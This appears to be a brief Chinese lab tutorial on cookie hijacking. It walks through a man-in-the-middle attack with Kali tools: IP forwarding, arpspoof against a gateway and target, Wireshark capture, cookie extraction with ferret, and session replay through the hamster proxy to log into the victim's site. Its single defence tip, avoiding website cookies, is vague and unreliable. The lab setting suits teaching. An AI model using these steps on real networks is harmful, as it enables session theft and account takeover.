cookies劫持

一.实验基础

kali(zenmap,wireshark,hamster)
物理机

二.实验步骤

1.修改kali与物理机的网卡适配器,保证虚拟机中的kali系统能够和外部网络通信(若不可以关掉防火墙)

2.修改kali镜像源
#vim /etc/apt/sources.list
deb kali-rolling main
non-free contrib
deb-src kali-rolling
main non-free contrib
更新软件,下载软件
#dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386
3.Zenmap扫描存活的主机

4.收集用户的登录信息cookies
开启kali路由转发功能
#echo 1 > /proc/sys/net/ipv4/ip_forward

中间人攻击
#arpspoof -i eth0 -t 网关 目标主机

wireshark保存窃取的流量为 **.pacp 文件

在物理机上登录相对应的网站,尽量选择安全性较低的,登录要留存过程

处理流量,生成cookies文件hamster.text
#ferret -r **.pacp

5.启动hamster
#hamster

打开浏览器选项中设置 代理为127.0.0.1::1234

地址栏输入127.0.0.1:1234

hamster 找到目标IP,登录目标用户的网站
三.防御
尽量不要使用网站cookies

注:

1.只能有一个网络连接

2.抓包的时候,抓取的时间,尽量长

3.目标网站(选择不带s的,即http)